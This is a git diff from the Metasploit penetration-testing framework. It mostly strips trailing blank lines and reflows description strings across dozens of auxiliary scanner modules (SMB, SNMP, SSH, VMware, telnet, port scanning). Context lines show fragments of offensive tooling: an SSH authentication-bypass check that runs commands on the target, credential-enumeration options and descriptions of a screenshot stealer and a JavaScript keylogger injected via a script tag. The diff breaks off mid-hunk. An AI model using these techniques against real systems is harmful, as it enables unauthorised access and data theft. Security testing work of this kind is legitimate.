a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -248,5 +248,3 @@ class Metasploit3 < Msf::Auxiliary end end - - diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index 53d9ecaf43..e742578162 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -234,5 +234,3 @@ class Metasploit3 < Msf::Auxiliary end end - - diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index 2a2928c666..1e804f960e 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -189,4 +189,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index 081db403fe..b83bb466e4 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -63,4 +63,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 0652d58609..fd3bb52b0c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -171,4 +171,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index 002f5dbce5..e5eb4386f9 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -44,4 +44,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index a64b0f05ee..8025687e7f 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary def support_ipv6? false end - + def run_batch_size datastore['BATCHSIZE'] || 256 end @@ -141,4 +141,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index 8a2c7690ff..a06963bc80 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary def support_ipv6? false end - + def run_host(ip) ports = Rex::Socket.portspec_crack(datastore['PORTS']) diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index 189548fb31..cf4d8307b9 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary deregister_options('FILTER','PCAPFILE') end - + # No IPv6 support yet def support_ipv6? false @@ -132,4 +132,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index ef03644f04..4fbbb17acf 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -98,4 +98,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index eb35cf5f49..fb045eef43 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary def support_ipv6? false end - + def run_batch_size datastore['BATCHSIZE'] || 256 end @@ -142,4 +142,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index b0ee049c5f..3a4dca2fad 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -100,4 +100,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 6bfef01d92..58d0e643ba 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -135,4 +135,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index 137608d368..d65a489251 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -121,4 +121,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index b30688dc78..99da31ebf7 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -120,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index a4382d0e96..c9f26dc984 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -88,4 +88,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index c03dad46af..aaa233305a 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -81,4 +81,3 @@ class Metasploit3 < Msf::Auxiliary p.recalc end end - diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 2bbff647af..610f9fc359 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -189,4 +189,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 13e8a00b0b..7a7d8df0f6 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -143,4 +143,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index d22c5bc780..977121dd4a 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -165,4 +165,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 128f666a4d..d505f561c8 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -119,4 +119,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index b5c2cbdd45..0fe359de19 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -111,4 +111,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index d0533e6dd6..f0b5260920 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -309,4 +309,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index fab1684f41..7b852b03c7 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -131,4 +131,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 8f038558a4..520e2deb99 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -331,4 +331,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index 5d4830cb21..0582b2626e 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -160,4 +160,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index df0a1cdcce..2168e91585 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -283,4 +283,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index a8531c24ae..e6b99f9dc7 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -143,4 +143,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 062f12c073..a44bd07643 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -40,4 +40,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index d4aaaa33d9..c7c30f4e43 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -80,4 +80,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 30c58bb13d..700a10acb2 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -165,4 +165,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index 7fd741e536..747d39550a 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -139,4 +139,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 30321c7ebe..ed82da0222 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -70,4 +70,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 13b0b0f6a5..0ce4d6caf8 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -67,4 +67,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index 159c1dd1ab..b3982fb559 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -313,4 +313,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 8d4d8ea617..832f2feb39 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary keepers << ssh_version if ssh_version next end - + # Needs a beginning next unless key =~ /^-----BEGIN [RD]SA (PRIVATE|PUBLIC) KEY-----\x0d?\x0a/m # Needs an end @@ -177,20 +177,20 @@ class Metasploit3 < Msf::Auxiliary else return :missing_keyfile end - + unless @alerted_with_msg print_status msg @alerted_with_msg = true end - + cleartext_keys.each_with_index do |key_data,key_idx| key_info = "" - + if key_data =~ /ssh\-(rsa|dss)\s+([^\s]+)\s+(.*)/ key_info = "- #{$3.strip}" end - - + + accepted = [] opt_hash = { :auth_methods => ['publickey'], @@ -203,27 +203,27 @@ class Metasploit3 < Msf::Auxiliary :skip_private_keys => true, :accepted_key_callback => Proc.new {|key| accepted << key } } - + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] - + begin ssh_socket = Net::SSH.start(ip, user, opt_hash) - + if datastore['SSH_BYPASS'] data = nil - + print_status("#{ip}:#{rport} SSH - User #{user} is being tested for authentication bypass...") - + begin ::Timeout.timeout(5) { data = ssh_socket.exec!("help\nid\nuname -a").to_s } rescue ::Exception end - + print_brute(:level => :good, :msg => "User #{user} successfully bypassed authentication: #{data.inspect} ") if data end - + ::Timeout.timeout(1) { ssh_socket.close } rescue nil - + rescue Rex::ConnectionError, Rex::AddressInUse return :connection_error rescue Net::SSH::Disconnect, ::EOFError @@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary :type => 'ssh_pubkey', :proof => "KEY=#{key[:fingerprint]}", :duplicate_ok => true, - :active => true + :active => true } this_cred = report_auth_info(cred_hash) end @@ -313,4 +313,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index 965a8354bf..73cbf2f2b6 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -182,4 +182,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index f190e6af9c..ad6b1d18da 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -284,7 +284,7 @@ class Metasploit3 < Msf::Auxiliary keyfile_path = store_loot( ltype, "application/octet-stream", # Text, but always want to mime-type attach it - ip, + ip, (key_data + "\n"), "#{safe_username}_#{ktype}.key", key_id @@ -321,4 +321,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index fb91b0aa85..e3fc88514f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -76,4 +76,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index ab153154ef..95aeca87d8 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -453,4 +453,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index 32a6075fe4..2ad1710b63 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -57,4 +57,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index 291ebf7756..e76bd1a163 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -247,4 +247,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 3549b40d11..2682c02699 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -54,4 +54,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 24e90eee2d..2bad9a2c56 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -191,4 +191,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 20f15ee859..02dd407dff 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -25,8 +25,9 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare ESX/ESXi Fingerprint Scanner', 'Version' => '$Revision$', 'Description' => %Q{ - This module accesses the web API interfaces for VMware ESX/ESXi servers - and attempts to identify version information for that server.}, + This module accesses the web API interfaces for VMware ESX/ESXi servers + and attempts to identify version information for that server. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -34,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary register_options([Opt::RPORT(443), OptString.new('URI', [false, 'The uri path to test against' , '/sdk']) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -98,4 +99,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index d37b833483..5cfbbab10c 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -140,4 +140,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 2dcd0e1c48..b010c47a42 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -132,4 +132,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index ca6e91670b..9c35372a5f 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -25,10 +25,11 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare Enumerate Permissions', 'Version' => '$Revision$', 'Description' => %Q{ - This module will log into the Web API of VMWare and try to enumerate - all the user/group permissions. Unlike enum suers this is only - users and groups that specifically have permissions defined within - the VMware product}, + This module will log into the Web API of VMWare and try to enumerate + all the user/group permissions. Unlike enum suers this is only + users and groups that specifically have permissions defined within + the VMware product + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -37,9 +38,9 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(443), OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]), - OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]), + OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -64,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary } end end - + esx_permissions = vim_get_all_permissions case esx_permissions when :noresponse @@ -93,8 +94,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - end - diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 32eff44272..80962a30ca 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -25,8 +25,9 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare Enumerate Active Sessions', 'Version' => '$Revision$', 'Description' => %Q{ - This module will log into the Web API of VMWare and try to enumerate - all the login sessions.}, + This module will log into the Web API of VMWare and try to enumerate + all the login sessions. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -37,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -80,8 +81,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - end - diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 8619a465c1..5265bb41c9 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -25,9 +25,10 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare Enumerate User Accounts', 'Version' => '$Revision$', 'Description' => %Q{ - This module will log into the Web API of VMWare and try to enumerate - all the user accounts. If the VMware instance is connected to one or - more domains, it will try to enumerate domain users as well.}, + This module will log into the Web API of VMWare and try to enumerate + all the user accounts. If the VMware instance is connected to one or + more domains, it will try to enumerate domain users as well. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -38,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -135,8 +136,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - end - diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 8dd06cff43..94f084f5f0 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -24,8 +24,9 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'VMWare Enumerate Virtual Machines', 'Description' => %Q{ - This module attempts to discover virtual machines on any VMWare instance - running the web interface. This would include ESX/ESXi and VMWare Server.}, + This module attempts to discover virtual machines on any VMWare instance + running the web interface. This would include ESX/ESXi and VMWare Server. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -37,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]), OptBool.new('SCREENSHOT', [true, "Wheter or not to try to take a screenshot", true]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -83,9 +84,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - - end - diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index 6a9032d943..621bdd673d 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -25,8 +25,9 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare Enumerate Host Details', 'Version' => '$Revision$', 'Description' => %Q{ - This module attempts to enumerate information about the host systems through the VMWare web API. - This can include information about the hardware installed on the host machine.}, + This module attempts to enumerate information about the host systems through the VMWare web API. + This can include information about the hardware installed on the host machine. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -38,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]), OptBool.new('HW_DETAILS', [true, "Enumerate the Hardware on the system as well?", false]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -57,9 +58,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - - end - diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index e525a0c121..bc1a040fc1 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('URI', [true, "The default URI to login with", "/sdk"]), Opt::RPORT(443) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -133,4 +133,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index 60c29cbf1c..7f3efbeb00 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -25,9 +25,10 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'VMWare Screenshot Stealer', 'Version' => '$Revision$', 'Description' => %Q{ - This module uses supplied login credentials to connect to VMWare via - the web interface. It then searches through the datastores looking for screenshots. - It will downlaod any screenshots it finds and save them as loot.}, + This module uses supplied login credentials to connect to VMWare via + the web interface. It then searches through the datastores looking for screenshots. + It will downlaod any screenshots it finds and save them as loot. + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -38,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]), OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]) ], self.class) - + register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),]) end @@ -105,8 +106,7 @@ class Metasploit3 < Msf::Auxiliary else print_error "Failed to retrieve screenshot: there was no reply" end - + end end - diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index e87f01b678..d7a9166525 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -97,4 +97,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 2021479623..77a577276a 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -193,4 +193,3 @@ class Metasploit3 < Msf::Auxiliary wdbrpc_request_connect(ip) end end - diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index d6c897f7c2..b604e69ded 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -155,4 +155,3 @@ class Metasploit3 < Msf::Auxiliary wdbrpc_request_connect(ip) end end - diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index e267917789..0940f5de50 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -993,4 +993,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index a6db47f090..c98329e476 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -22,9 +22,8 @@ class Metasploit3 < Msf::Auxiliary To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", - the following URL will load this script into the calling site. - http://server:port/test/anything.js - + the following URL will load this script into the calling site: + http://server:port/test/anything.js }, 'License' => MSF_LICENSE, 'Author' => ['Marcus J. Carey ', 'hdm'] @@ 